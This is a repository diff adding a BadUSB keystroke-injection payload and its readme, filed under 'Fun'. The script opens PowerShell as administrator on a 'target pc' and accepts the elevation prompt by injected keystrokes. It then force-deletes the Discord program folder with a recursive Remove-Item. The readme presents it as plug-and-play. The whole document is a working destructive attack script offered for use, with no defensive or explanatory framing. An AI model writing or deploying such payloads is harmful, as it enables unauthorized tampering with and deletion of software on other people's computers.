🤬
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/Delete_Discord/delete_discord.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Deletes discord if it exists on the target pc.
     3 +REM Version: 1.0
     4 +REM Category: Fun
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 300
     8 +REM Start PowerShell as Admin
     9 +STRING powershell Start-Process powershell -Verb runAs
     10 +DELAY 300
     11 +ENTER
     12 +DELAY 500
     13 +LEFTARROW
     14 +DELAY 450
     15 +ENTER
     16 +DELAY 600
     17 +REM delete discord
     18 +STRING if (Test-Path "C:\Program Files (x86)\Discord") { Remove-Item -Recurse -Force "C:\Program Files (x86)\Discord"; Write-Output "Deleted Discord from $discordPath" } else { Write-Output "Discord is not installed on this computer." }; exit
     19 +DELAY 200
     20 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/FUN/Delete_Discord/readme.md
     1 +
     2 +# Delete_discord
     3 +Checks if discord is installed on the target, if it is installed it will delete discord.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- check if discord is installed
     14 +- delete discord if exists
     15 +
     16 +
     17 +## Feedback
     18 +
     19 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Support
     27 +
     28 +For support, contact me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +## Meta
     32 +
     33 +
     34 +- If you want to sponsor me on Patreon, the link is on my profile.
     35 +
     36 +
     37 + 
Please wait...
Page is in error, reload to recover